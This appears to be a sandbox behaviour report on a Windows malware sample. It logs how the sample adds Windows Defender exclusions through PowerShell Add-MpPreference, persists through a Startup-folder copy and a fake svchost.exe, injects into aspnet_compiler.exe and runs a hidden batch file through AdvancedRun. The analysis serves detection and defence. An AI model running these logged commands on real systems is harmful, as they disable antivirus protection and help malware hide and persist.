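                      Only the address and a parseable header can prove the in-place replacement; the report's "value starts with: 4D5A" alone earns a medium grade here because the sandbox kept just the prefix. An analyst with a full memory capture of the write should feed the complete buffer in and expect the verdict to rise to high.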
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Writes to foreign memory regions
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 438000
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43A000
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: CF7008
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | Process created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
